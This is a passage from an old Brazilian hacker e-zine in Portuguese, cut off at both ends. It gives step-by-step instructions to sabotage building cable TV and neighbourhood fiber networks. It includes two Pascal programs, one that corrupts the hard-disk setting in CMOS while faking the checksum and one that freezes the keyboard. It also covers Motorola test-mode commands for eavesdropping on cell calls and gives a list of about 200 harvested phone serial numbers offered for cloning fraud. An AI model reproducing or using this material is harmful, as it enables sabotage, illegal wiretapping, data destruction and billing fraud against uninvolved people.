caixinha do predio, ele pode ser branco, rosa ou preto ( aquele fininho que sai de dentro do line extender ). Quase que com certeza ele estara no sotao do predio pq o sinal tem q descer. Troca esse cabo pelo de uma fil- madora e colocar rodar numa daquelas fitinhas um filme porno qual quer. Soh vai pegar isso em todos canais do predio! Detonando com TV a Cabo do seu predio todo >: --------------------------------------------- Voce precisa abrir a caixa onde esta o LE ( line extender ). Vai ver 3 PADs amarelo com numeracao 0 1 2 ai entao vc retira os pads com numero 0 e troca pelo 2 ( vai pegar fogo ). Pra detonar mais ainda liga o liner numa corrente 110 W, pode ter certeza que no minimo o predio ficara 1 mes sem TV a Cabo! Vai queimar todos os cabos e ter que trocar tudo!!!!! E seus vizinho vao se fuder :) Detonando com uma rede de fibra otica do seu bairro >: ---------------------------------- Encontre a caixa com o receptor otico estara escrito RO na caixa abra com uma chave qualquer mas cuidado pra nao quebrar a fibra. Pega uma das fibras, estica da um TOP, um nozinho! NAO QUEBRA PQ SENAO E' RUIM! O erro e'indetectavel e a cada fi- bra de 5 a 6 mil pessoas estarao fora do ar desde que seja uma fibra ativa! Pra identificar procure a separada das demais, com cor azul e laranja! Conselho de amigo, faca BEM escondido se te pegarem o prejuizo e' enorme e isso e' vandalismo. ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 16:> Pequenos esquemas... ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by futuro membro ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù O autor desses pequenos programas preferiu ficar anonimo. Se na proxima edicao ele aceitar publicamos o nome do rapaz. Apesar de pequenos e re- almente simples eles sao bastante interessantes. Vamos lah: P.S: descricao dos programas feitas pelo proprio autor. <------------------------ Inicio (HD.pas) ------------------------> { Para maiores detalhes ver PCHELP procurar CMOS ( Tem todos os enderecos la' ). * Porta 70h = Endereco a ser lido/escrito * Porta 71h = Dado a ser lido/escrito no endereco especificado Testado e aprovado em Intel montado com Bios Haward. Nao testado ainda em IBMs. coded by: ??????? } Function RCmos( Endereco : Byte ) : Byte ; Begin Port[ $70 ] := Endereco ; RCmos := Port[ $71 ] ; End ; Procedure WCmos( Endereco, Dados : Byte ) ; Begin Port[ $70 ] := Endereco ; Port[ $71 ] := Dados ; End ; Var I, Sum : Word ; Begin WCmos( $19, 1 ) ; { Seta o HD Type = 1 ( 10 Mb ) } Sum := 0; For I := $10 To $2D Do Sum := Sum + RCmos( I ) ; WCmos( $2E, Hi( Sum ) ) ; { Refaz o CheckSum da CMOS } WCmos( $2F, Lo( Sum ) ) ; { Para enganar o Setup } { So' os Bytes de 10h ate 2Dh } { Sao envolvidos no CheckSum. } End. <------------------------ FIM (HD.pas) ------------------------> Este primeiro programa seta o HD Primario com Type 1, que eh um HD de 10Mb do tempo do Ari. E o melhor ... ele arruma o CheckSum da Cmos para que o setup nao perceba a mudanca. Com o Hd em 10Mb qualquer coisa gravada em um endereco fora disso (nao eh dificil) gera um erro do tipo: erro gravando unidade C: A, R, F. Reduzi o Cmos.com para 4 instrucoes, pois percebi que baleando apenas um dos bytes do CheckSum jah chega pra fazer bagunca. <------------------------ Inicio (trava.pas) ------------------------> Uses Dos ; Begin SetIntVec( $9, Ptr( 0, 0 ) ) ; End. <------------------------ Fim (trava.pas) ------------------------> Este outro .pas dah um baita dum travaco no teclado (mesmo no win) que em breve implementarei em TSR. Ele somente redireciona a Int 9h (tecla- do) para um pointer loco. Agradecimentos a meu amigo que preferiu ficar anonimo. Vamos fazer pres- sao para que ele escreva mais esquemas desse tipo. ;) ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 17:> Acabando de vez com a telefonia celular Brasileira - PARTE I ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by VooDoo ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Antes de mais nada um aviso: este artigo foi feito com base em alguns manuais, revistas e consultas com profissionais da area. Para nossos testes e outros esquemas utilizamos um aparelho Motorola Micro-tac Eli- te e um ESN Reader (a mais nova aquisicao da axur05, chamado pelos mais intimos de "scanner"). Para o pessoal realmente interessado em celulares estaremos colocando brevemente alguns textos, informacoes e programas relacionados a progra- macao, escuta e clonagem em nosso site (alguns destes arquivos nao es- tao disponiveis na Inet e estarao em um diretorio protegido por senha porque nao queremos ninguem fazendo merda com estas informacoes). Qual- quer erro, sugestao, informacao ou comentario sobre este documento, mail-me. P.S: Dica para aqueles que estao procurando alguem que lhes ensine tudo desde o comeco: ligue para os caras da telco do seu estado, fale sobre os seus interesses e prepare um refresco para quando os federais forem te fazer uma visita. Introducao ========== Eh, antes de mais nada uma pequena introducao de o que eh e como funcio- na o sistema celular. Eu disse *pequena introducao*, ou seja, nao vou escrever um guia totalmente detalhado. Quer mais informacoes? Procure! O que eh um telefone celular? Aparelho radiotelefonico de 800 MHZ, operando com 3 watts e capaz de mu- dar automaticamente de canal ao comando do "nanocomputer" porco da cen- tral. O que eh ESN? Eh uma sigla para Electronic Serial Number. Todo aparelho tem um bem guardado na memoria. Em outras palavras eh a alegria do phreaker. Por- que? Bem, o ESN eh a identidade de um celular. Com ele eh possivel clo- nar um aparelho (ohhh). Quando voce vai fazer uma ligacao, o aparelho manda este ESN e o MIN para a celula. A base entao manda novamente o MIN e um sinal tipo "vai firme filho" se no seu banco de dados o MIN/ESN for compativel com o que foi enviado. Algumas novas maravilhas da tecnologia verificam o ESN/MIN diretamente na central e soh depois dizem "vai firme filho". O que eh MIN? Cellulars Phone Number - Obviamente, todo aparelho (habilitado) tem um na memoria. Um aparelho pode ter dois numeros, porem, isso sao outros esquemas. O que eh NAM? Sigla para Number Assignment Module. Eh um componente da Epron/EEpron onde ficam armazenados o ESN, MIN, SCM (sigla para Station Class Mark), lock code (codigo necessario para o acesso a algumas funcoes e que im- possibilita o uso nao autorizado do aparelho) e outros esquemas... Al- guns aparelhos podem ser reprogramados pelo "teclado" mesmo (Oki900), porem, eles "trancam" apos 3 mudancas de MIN (alguns aceitam mais mudan- cas, mas em geral eh 3). Esses aparelhos mais novos da Nokia, Motorola, Erickson, etc, nao trancam mas tambem nao permitem a programacao do NAM sem a gravacao da Epron. Funcionamento ============= Bom, o funcionamento do sistema celular eh algo bastante interessante e cheio de etapas. Basicamente eh o seguinte: existem, ao contrario do que muitos pensam, 3 bandas de celular. Uma para a compahia telefonica do seu estado (telco), uma para empresas independentes ou privadas que pagaram pouco e ganharao muito explorando essa banda e uma reservada pa- ra uso futuro. Respectivamente banda A, B e C. O sistema celular eh dividido em pequenas areas chamadas celulas. Cada uma destas celulas eh como se fosse uma "base" cheia de equipamentos de monitoramento e controle (geralmente estas celulas sao torres com uma pequena "casa" muito bem fechada). Cada celula possui canais especifi- cos associados a ela (canais de controle e voz). Todas estas celulas ou bases estao conectadas a uma central onde, por fim, todo o esquema eh controlado. OK, originalmente existem 666 (!) frequencias ou canais usa- dos pelos celulares. Em 1988, nos EUA (onde o sistema celular obviamente chegou muito, muito antes) os malucos meteram mais 156 canais, somando um total de 832 (AMPS) canais. Em 1992 o numero de canais do sistema ce- lular era de 2412 (NAMPS). Com todas essas mudancas os fabricantes tive- ram que adaptar os aparelhos a essas novas frequencias. Entao para que servem esses canais? Ok, como jah sabemos existem 832 ou 2412 (sistema NAMPS) canais disponiveis. 416 dos 832 canais estao dispo- niveis para a Banda A e a outra metade estao disponiveis para a banda B. Obviamente, se o sistema for NAMPS temos 1206 para a banda A e 1206 para a banda B. Cada um destes canais possui duas frequencias e operam em mo- do full duplex (espacamento de 45 MHZ). A frequencia mais baixa eh para o aparelho e a frequencia mais alta eh para a base (frequencia de envio e de recebimento). Desses 416 ou 1206 canais, 21 sao de controle, ou seja, canais que con- trolam e "configuram" uma ligacao. Estes canais de controle servem ape- nas para transmissao e recebimento de informacao digital entre o apare- lho e a base. O resto dos canais sao de voz. Atualmente os canais sao numerados de 1 ate 1023 e existem programas que convertem canais em frequencias ou vi- ce versa. Para os programadores e interessados ai vai a formula para fazer tal conversao: /* P.S: Extraido do help do programa motcell */ /* Originalmente com 666 canais o esquema eh o seguinte: */ Banda (A) * Canais de controle = 21 (313 -> 333) * Canais de voz = (001 -> 312)... | |-> 395 sistema AMPS |-> 1185 sistema NAMPS Banda (B) * Canais de controle = 21 (334 -> 354) * Canais de voz = 355 -> 666 | |-> 395 sistema AMPS |-> 1185 sistema NAMPS /* Formulas para freq -> canal , canal -> freq */ N = Numero do canal F = Frequencia do celular Se B = 0 --> (aparelho) Se B = 1 --> (celula ou base) (*) FREQUENCIAS PARA CANAIS: F = 825.030 + B*45 + (N-1)*.03 /* N = 1 ate 799 */ F = 824.040 + b*45 + (N-1)*.03 /* N = 991 ate 1023 */ (*) CANAIS PARA FREQUENCIAS: N = 1 + (F-825.030-B*45)/.03 /* F > = 825.030 (aparelho) */ /* F > = 870.030 (base) */ N = 991 + (F-824.040-B*45)/.03 /* F < = 825.000 (aparelho) */ /* F < = 870.000 (base) */ Como jah sabemos, quando uma ligacao vai ser feita o aparelho envia o ESN/MIN para a base. Mas ele nao envia apenas esta informacao. O siste- ma precisa saber a "aparencia" do aparelho que esta sendo utilizado. Em outras palavras, o sistema nao consegue saber se uma transmissao pode ser passada para determinado canal sem que o aparelho forneca esta in- formacao. Entao o celular manda um numero binario de 4-bit com algumas informacoes pessoais onde: bit #1 bit #2 (Salva bateria nos startac [portateis] da vida) | | |- 0 = 666 canais |- 0 = Unidade Movel |- 1 = 832 canais |- 1 = Transmissor de voz ativo bit #3 | |- 00 = 3.0 watts |- 01 = 1.2 watts |- 10 = 0.6 watts |- 11 = ??? Putz! O que a tecnologia nao faz... :) Os aparelhos podem funcionar em diversos sistemas. Ultimamente soh se fala em digital e coisarada e tal... Em alguns estados ainda estao im- plantando esse sistema mas os interessados podem procurar a telco local e solicitar o servico. Os novos sistemas que estao circulando por ai sao o TDMA e o CDMA, res- pectivamente Time-Divison Multiple Acess e Code-Divison Multiple Acess. Porque que eles diferem do sistema tradicional? Ora, no sistema TDMA duas ou mais ligacoes podem usar o mesmo canal simultaneamente apenas com pequenas pausas na conversacao de uma das partes. Com essas pausas, programadas pela compahia telefonica, a mesma pode acomodar o outro tra- fico no mesmo canal. Por esse motivo que ha a melhora da qualidade e me- nor indice de ligacoes "perdidas". O sistema CDMA eh o sistema usado por militares. Nao tenho muitas informacoes sobre esse sistema mas parece que a trasmissao eh "compactada" em uma das partes e descompactada no seu destino. Se eu estiver errado por favor mail-me. Muitos executivos das telcos andam por ai fazendo propaganda e dizendo que o sistema digital vai acabar com as fraudes e fornecer diversas no- vas utilidades aos usuarios do servico. Nao, nao vai acabar com as fra- udes. Com certeza vai diminuir as fraudes mas acabar nao vai. As frau- des vao desaparecer quando os phreakers tambem desaparecerem, ou seja, nunca. Entao vamos abordar o nosso velho e bom (?) sistema analogico, FDMA (Frequency-Division Multiple Access). Nesse sistema, os canais (fre- quencias) livres sao encontradas pelo sistema e cada transmissor eh as- sociado a uma delas. Entao quando a ligacao termina os canais que esta- vam ocupados ficam novamente livres para uma proxima transmissao ou li- gacao. Quem jah fez escuta pode realmente ver como isso funciona. A conversa termina e o SHSHSHSHSHSHSHSHSHSHSHSHSH comeca. Isso tambem ex- plica o congestionamento do servico em grandes cidades. Bom, chega de papo e vamos ao que interessa... Phreaking ========= Existem, basicamente, dois tipos de phreakers de celulares: o primeiro e mais comum eh aquele que fica propurando e scaneando canais. O inte- resse desse pessoal eh, na maioria das vezes, ficar escutando conversas de terceiros que o cara nem imagina quem possa ser. Apesar de ser o ba- sico quando se fala em celular phreaking eh bastante divertido e, as vezes, lucrativo. Como? Ora, pense bem. Hoje em dia a maioria dos ban- cos aceita consultas via phone (!). Eh soh usar a imaginacao. Outra coisa: 99,9% das pessoas que conversam em telefones celulares nao ima- ginam que alguem possa estar escutando a conversa. Entao voce ouve a amante ligando para o velho barrigudo e canalhao, conversas importantes de negocios, numeros de cartoes de credito em compras nos shoptimes da vida e uma infinidade de outros esquemas... Agora a parte realmente interessante: como fazer isso? Facil, explicaremos o metodo que usamos em nosso aparelho teste (lem- bre-se que nosso aparelho de testes eh um Micro tac Elite). Ok, a motorola, nossa grande amiga que poe sempre o cliente em primeiro lugar, facilitou bastante a vida de programadores e outras "especies". Nos novos aparelhos, nada de tirar a bateria, papel laminado nos cone- ctores e essas merdas todas. Apenas um codigo e voce esta em modo de "programacao" (usei aspas porque esse metodo eh um pouco limitado e pa- ra entrar em modo de programacao propriamente dito sao outros esquemas). Pegue o seu aparelho ou o do seu velho (de uma boa desculpa para o ve- lho que ele libera) e digite o seguinte codigo: P.S (1): eh necessario que voce digite o codigo com uma certa rapidez entao pessoas com pouca coordenacao motora nao devem tentar isso. P.S (2): isso funciona em ALGUNS aparelhos apenas, depende da versao do software. Portanto, se voce esta tentando esse codigo em um motorola antigao de 3,5 KG que tinha ate rodinha pra carregar e nao esta funcio- nando, nao reclame! Compre um mais novo. FCN + 0 + 0 + * + * + 83 78 66 33 + STO Bem, se voce foi capaz de digitar isso corretamente e o esquema fun- cionou voce vera um esquema mais ou menos assim: ÉÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ABC = Canal atual D = Em branco -> AMPS (832) º º A B C D E F G º A -> NAMPS (HSC) º º H I J K L M N º I = 1 -> TX on B -> NAMPS (CSC) ÈÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ 0 -> TX off C -> NAMPS (LSC) M = 1 -> RX off N = 1 -> TX off 0 -> RX on 0 -> TX on Para o nosso esquema soh precisamos saber essas informacoes. Porem, ai vai o significado das outras letras exibidas no display: EFG = Leitura de RSSI para o canal atual H = Frequencia SAT J = Sinal de tone L = Canal de controle ou voz Caso queira se aprofundar mais e conhecer todos os esquemas procure a biblia do motorola ou outro manual de habilitacao de celular. Ok, vamos para proxima etapa. Existem diversos comandos de programacao nesse chamado test-mode da motorola. Apos digitar o codigo para entrar em test-mode e aparecerem alguns numeros e coisarada tecle "#". O dis- play mostrara uma linha de comando tipo essa: ÉÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º º US ' º º º º ÈÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Eh nesta linha que devem ser digitados os comandos que vamos utilizar. Lembre-se que a tecla "#" funciona como o ENTER do seu computer. Entao voce digita o comando desejado e tecla "#" (pelamordeDeus, voce deve teclar esses comandos no aparelho celular e nao no computer, eh soh um aviso porque com certeza iria ter gente procurando a tecla FCN no te- clado do computer). Os comandos que vamos utilizar sao os seguintes: 02# = joga para o display as informacoes do aparelho. Apenas exibe aquela "tela" de entrada que explicamos logo acima. 04# = deixa o aparelho com as "configuracoes" originais. Nao digite isso a nao ser que seja extremamente necessario. 07# = RX off 08# = RX on Ok, chegamos ao ponto onde a coisa fica realmente interessante. Como jah vimos um aparelho celular eh capaz de enviar e receber "informa- coes" ( audio principalmente ). Este comando apenas liga o recebimento de audio. Sim, e dai? Bom, quando falamos em recebimento de audio esta- mos falando de conversas que vagam alegremente por esse mundao grande de Deus. ;) Para fazer sua escuta diaria siga as etapas abaixo: 1) Escolha um canal. Nossa, jah vimos que existem 832 canais em siste- ma AMPS. POREM, a nossa amiga motorola viu que muitas pessoas como voce estavam usando esse comando para fazer escuta e deram um basta nessa historia. Putz, entao nao eh mais possivel fazer escuta? Nao, claro que nao. A motorola apenas limitou os canais nos novos aparelhos. Para esses aparelhos os canais disponiveis sao apenas os seguintes: 300 / 333 / 385 / 799 / 800 2) Apos escolher um canal digite 11 + ÉÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Exemplo: º º '11231 º º º º ÈÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ 3) Tecle "#" e logo apos tecle 08 e "#". Veja se voce escuta alguma conversa ou algum chiado horrivel. Caso escute alguma coisa o seu apare- lho aceita os 832 canais (1 a 1023). Caso nao escute nada o seu apare- lho eh mais novo e soh aceita os 5 canais mostrados acima. Escolha de preferencia o canal 300 para fazer sua escuta diaria. Lembre-se que pa- ra acessar o canal 800 deve-se teclar 11991 ao inves de 11800. 4) Para desligar o recebimento de audio tecle 07 e "#". 5) Quando encontrar uma conversa bastante atrativa digite 40 e tecle "#". Isto faz com que o aparelho exiba informacoes do canal (atual) de voz. O display mostrara '40'. Pra que serve isso? Basicamente para saber se uma transmissao (conversa) foi alocada em outro canal e continuar ou- vindo a conversa "atrativa". Se voce digitou esse 40# e a conversa ainda continua legal e tal, o comando apenas serviu para ajustar os niveis de potencia em determinada celula. Neste caso precione CLR ou "#" e nova- mente tecle o comando 40 e "#". Continue ouvindo normalmente a conversa atrativa. Caso deseje cancelar o comando 40# tecle apenas "#". Se voce estava escutando esta conversa atrativa e derrepente ela sumir faca o seguinte: 1) anote o numero hexa que foi exibido no display. O formato do numero eh XXXXYYYXXX. O que nos interessa eh apenas o YYY. 2) Converta esse YYY para binario 3) Converta de binario para decimal 4) Anote o resultado. Esse resultado eh o novo canal onde a conversa atrativa foi alocada. Tecle 11 + e continue ouvindo. ;) Exemplo: 12af11a38c ||| ||| binario decimal 11a ----------> 100011010 ---------> 282 Logo apos apenas digite 11282, tecle "#", digite 08, tecle "#" e continue ouvindo. Interessante nao? :) Outros comandos interessantes e que nao exigem muito conhecimento de programacao e coisarada sao os seguintes: 13# = Desliga o aparelho. 18# = Exibe todo o conteudo do NAM. Utilize a tecla "*" para mostrar ou- tras informacoes (como se fosse avancar de pagina). 19# = Exibe a versao do software. Formato: XXYY (XX = ano / YY = semana). 32# = CUIDADO! Apaga todas as programacoes feitas pelo usuario e infor- macoes armazenadas no aparelho (ultimo numero discado, etc...). Bom para o cara que liga pra amante e tem uma mulher que fica fu- cando no aparelho do cara. ;) 38# = Mostra o ESN em etapas, cada etapa com 2 numeros hexa. Utilize a tecla "*" para avancar estas etapas. Mostre esses numeros para alguem e veja o seu velho ter um ataque do coracao quando receber a conta do aparelho. 55# = Entra em modo de programacao propriamente dito. Este comando eh assunto para mais umas 20 paginas. Quem sabe em um proximo arti- go... ;) Ok, agora que sabemos como fazer escuta e coisarada vamos ver o que e- xiste de mais "pesado" no mundo do celular phreaking. Como eu havia di- to, existem (basicamente) 2 tipos de phreakers de celular. Jah vimos o primero tipo. Agora vamos tratar do segundo. O segundo tipo de phreaker e um pouco mais raro do que o primeiro eh o cara que possui equipamento especial, conhece a programacao dos apare- lhos e modifica os mesmos para fazer ligacoes gratuitas e outros truques bastante complexos. Na verdade, esse segundo tipo nem eh tao raro assim porque no Brasil ta cheio e deve ser ressaltado tambem que essas liga- coes "gratuitas" sao gratuitas apenas para o phreaker porque certamente alguem vai pagar por elas. Quem? Alguem que com certeza tera um ataque quando receber a conta. O fato eh que quem sai no prejuizo mesmo eh a empresa ou companhia tele- fonica. Pelo o que eu sei, o usuario lesado pode reclamar das ligacoes para a Indonesia, tele-Sexo, tele-amigos, tele-qualquer_coisa e a empre- sa cobra apenas a tarifa basica e outras ligacoes efetuadas pelo usua- rio. Quando o cara vai reclamar eles pedem se ha a possibilidade da es- posa, filhos, amigos ou colegas de trabalho terem feito essas ligacoes todas. Se o cara responder que nao tem muita certeza, ha o recurso de voz. As ligacoes mais recentes ficam todas gravadas. Entao o cara vai lah, ouve a voz do phreaker gemendo com uma puta gorda no phone e diz: "certamente nao eh ninguem da minha familia". Nao tenho certeza, mas para usar esse recurso os caras da telco cobram uma taxa que varia de uns 50 a 100 reais. Eh caro, mas eh melhor do que pagar a conta de 2000 reais de alguem que ficou falando com gordas pelancudas. Bom, e que tipo de aparelho essa especie usa? O mais comum e que pode ser facilmente adquirido em um pais aqui perto do Brasil a um preco bem camarada eh o ESN Reader (chamado tb de scanner). Esta maravilha da tec- nologia permite a qualquer phreak a captura de dezenas, centenas ou mi- lhares de ESN/MIN em apenas um dia. O aparelho nao eh tao facil de ope- rar, exige alguns ajustes mas realmente funciona (veja na materia se- guinte o que conseguimos fazer com um destes aparelhos em apenas algumas horas no centro de uma pacata cidade, aos olhos de diversos policiais que devem ter pensado que estavamos levando um pequeno aparelho de som) ;) Outros equipamentos preferidos pelos phreakers sao os aparelhos que permitem a re-gravacao da Eprom diretamente do aparelho, apenas com di- versos comandos digitados no teclado ou com ajuda de software especiais feitos pelos proprios phreakers. Um exemplo destes celulares eh o OKI900. Este aparelho era a maior motivacao do hacker Kevin Mitnick e o OKI900 foi um dos principais motivos que levaram o hacker preso. Se nao me engano ele invadiu os computers do japa ninja a procura de codigos fontes e informacoes sobre este aparelho. De posse das informacoes arma- zenadas nos computers do japa, kevin poderia ficar indetectavel dentro de qualquer sistema celular. Sabe-se que com um ESN/MIN eh possivel re-gravar a Eprom e clonar um a- parelho. E com que objetivo eh feita a clonagem? Basicamente para fazer ligacoes "gratuitas" e nunca ser pego pois eh MUITO dificil detectar al- guem usando aparelho clonado que esta em funcionamento na banda A. Exis- tem tb noticias de phreakers que reprogramam a Eprom de um aparelho e o mesmo passa a funcionar como um ESN Reader, ou seja, o proprio celular procura ESN/MIN's e automaticamente armazena os mesmos na memoria. Bom, entao era isso! Ainda existem muitas coisas para se descobrir so- bre telefonia celular. Soh tenha cautela e nao faca nada estupido. O mundo phreak eh bastante divertido mas tambem bastante traicoeiro. NOTA (1): escuta telefonica pode dar de 3 a 5 anos de cadeia. NOTA (2): nao sei ao certo mas fraudes telefonicas devem dar bem mais. NOTA (3): este artigo tem o proposito apenas de distribuir informacao. Se nao gostou, ignore! Se se sentiu ofendido com informacoes contidas nesse texto, ignore! Se esta pensando em fraudar o sistema celular, vai firme! Nao to nem ai se te pegarem. Pro- blema seu, responsabilidade sua! ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 18:> Acabando de vez com a telefonia celular Brasileira - PARTE II ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD & VooDoo ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Pai, acho que depois dessa no's vamos preso! Deem uma olhada no que conseguimos em 5 dias scaneando ESN/MINs. Hehehe... tem neguinho que chega com 3 ESN e acha que agita! Essa e' pra meter no cu de quem ain- da nao acredita no poder da fraude. Axur05 voltando em ALTO estilo! hihihihihi.... Cada numero deste e' mais um clonezinho no mundo ( viva a fraude ). Nao esqueca que ate a calculadora do WINDOWS converte essa porra pra ESN/MIN soh coloca no hexa, digitar o numero depois converter pra deci- mal. Nao to afim de converter pq terei que faze-lo manualmente e o filtro que usei me deu essa saida. Por favor se vc e' daqueles super-hackers do canal #hacker nao use is- so, afinal estamos falando de phreaking ;P Espero que meu todo trabalho tenha sido util. * 200 NUMEROS HEXADECIMAIS PARA CLONAGEM by AXUR05 BRAZIL * Obs. Aos inuteis e incapacidatos! Eu ja fiz o trabalho de converter estes ESN/MINs mas no caso de vc pegar um lembre-se de fazer sem- pre: ESN:1234567890 - 10 digitos Tire o ultimo numero no caso o 0 123456789 Coloque isso na calculadora do Windows usando DEC Mude para HEXA e a saida sera': HEXA: D432A5FF HEXA: D5754939 HEXA: D4236B40 HEXA: D432A3OF HEXA: D4393423 HEXA: D470929C HEXA: D47092F8 HEXA: D470930B HEXA: D4393309 HEXA: D4436809 HEXA: 9D14F9C1 HEXA: 9D1B0C87 HEXA: 9D1B0C87 HEXA: 9D1B087D HEXA: 9D1BD85C HEXA: A2218981 HEXA: A2201CFD HEXA: A2218800 HEXA: D58B08B4 HEXA: A22188BA HEXA: D59329CF HEXA: D42B70E0 HEXA: D59B07A6 HEXA: D5997742 HEXA: A2201BC9 HEXA: 9D1B0C87 HEXA: D59FA79B HEXA: D58A7D18 HEXA: D5589803 HEXA: D58B08BA HEXA: D58B08BA HEXA: D558F185 HEXA: D593266D HEXA: D5CC0828 HEXA: D5A4718D HEXA: D58BD0A0 HEXA: D5AA1BB5 HEXA: D5927BBA HEXA: D5A4718D HEXA: D59329C5 HEXA: D5CC08B5 HEXA: D59A06E4 HEXA: D5CC09EA HEXA: D5932A7A HEXA: D59A06E4 HEXA: D59AC0DB HEXA: D59AD228 HEXA: 9C6B82D9 HEXA: D5BDB6A3 HEXA: D5BF61EC HEXA: D5BCBF2C HEXA: D5BF61C5 HEXA: D59857D1 HEXA: D5BDB6A3 HEXA: D5BF61EC HEXA: D5BCBF2C HEXA: D59857D1 HEXA: D5B7A3AF HEXA: D59BC66B HEXA: C3B00118 HEXA: D5BF618C HEXA: D5985844 HEXA: D5BCBF96 HEXA: D5BF6187 HEXA: D5B7A3AD HEXA: D5BF61C0 HEXA: D58B77CA HEXA: D58B1A7C HEXA: D5B0D29D HEXA: D558789D HEXA: D5B21EF7 HEXA: D5CC0A33 HEXA: 9C6B7887 HEXA: 9D2D3CD9 HEXA: D4321E5D HEXA: D433E42E HEXA: D4321F01 HEXA: C3FBCE13 HEXA: C3FBCEE4 HEXA: D5B3C7C4 HEXA: D5B3C7C4 HEXA: D5982DB2 HEXA: 9C6B82A6 HEXA: D59341E5 HEXA: D5984CC8 HEXA: D593283F HEXA: D59343D0 HEXA: D5925E2C HEXA: D593279B HEXA: D5930620 HEXA: D593254B HEXA: D593254B HEXA: D5930770 HEXA: D5925E64 HEXA: D59321CD HEXA: 9C68ED41 HEXA: 9C6B786F HEXA: D59A420B HEXA: D5CC04D3 HEXA: D5CC04CE HEXA: D5B3C95C HEXA: D5B898E9 HEXA: D5B898E9 HEXA: 9C6B7F89 HEXA: D59BAA31 HEXA: 9C75A37D HEXA: 9C75A382 HEXA: 9C759916 HEXA: D5B21F4E HEXA: D5B7AC1A HEXA: D5C63455 HEXA: D5B34B8D HEXA: D5C62BD2 HEXA: D5B89356 HEXA: D5FAE153 HEXA: 9C75A702 HEXA: 9C75A702 HEXA: 9C75A702 HEXA: D5C5197E HEXA: D5C62BAC HEXA: D5C4BB42 HEXA: D5C63456 HEXA: D5C63456 HEXA: D5B89348 HEXA: D5B34BE4 HEXA: D5B89A19 HEXA: D5CC1DA5 HEXA: D5B7B6F9 HEXA: D5B7B6F9 HEXA: D5B898EA HEXA: D5CC1DAC HEXA: D5C42C71 HEXA: D5C516DC HEXA: D5B89504 HEXA: D5C63453 HEXA: D5984F52 HEXA: D5B34BD0 HEXA: D58B1C50 HEXA: D5B1DDB5 HEXA: D5B34BCE HEXA: D5CC04D0 HEXA: D5983061 HEXA: D5B024BA HEXA: D5B21FFC HEXA: D58BDAE2 HEXA: D58BDAE2 HEXA: D5ABA952 HEXA: D5B21ED9 HEXA: 9C68F2E0 HEXA: 9C68EEAD HEXA: D5CC385B HEXA: 9C68E7D4 HEXA: 9C678E63 HEXA: 9C6B7F71 HEXA: D5B04249 HEXA: 9C6B83C3 HEXA: D5B024A2 HEXA: 9C68EED7 HEXA: 9C68EECB HEXA: 9C68EECB HEXA: D5C4A438 HEXA: D5B3F022 HEXA: 9C68EEAE HEXA: D58BD93E HEXA: D58BD93E HEXA: D59A6157 HEXA: A21889DD HEXA: A21A72DD HEXA: D5B3C90C HEXA: 9C68EB1C HEXA: 9C68EB1C HEXA: 9C6B7940 HEXA: D5ABA9A1 HEXA: D5AA563F HEXA: D5AA563F HEXA: D59A42BC HEXA: D59A748C HEXA: D59A0844 HEXA: D558FF6F HEXA: D599CA8C HEXA: D59A3696 HEXA: D593A5C2 HEXA: D5A932EC HEXA: D5AB8056 HEXA: D59A42BC HEXA: D59A748C HEXA: D59A0844 HEXA: D558FF6F HEXA: D599CA8C HEXA: D59A3696 HEXA: D59345C2 HEXA: D5A932EC HEXA: D5AB8056 HEXA: D59A42BC HEXA: D59A748C HEXA: D59A0844 HEXA: D558FF6F HEXA: D599CA8C HEXA: D59A3696 HEXA: D59345C2 Na hora da clonagem, quem conhece sabe que soh isso que importa. Junte este com o outro documento e teras o maior documento em portugues para phreaking ate hoje escrito! Nao saia por ai fazendo idiotices, lembre-se, o crime sera de responsabilidade SUA. Se acontecer algo conosco que seja de conhecimento publico, pelo amor de Deus... nao parem de clonar ;)) ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 19:> Project: Remote backdoor development kit ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by csh ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Eh isso ai gurizada... na real esse projeto nao deve mais ser chamado de remote backdoor development kit, mas sim um kit de programacao pra client/server usando BSD sockets. Tentei escrever o codigo o mais limpo possivel, teoricamente ele eh compativel com todos os unices(testado em linux, bsd, aix, sysvr(80% 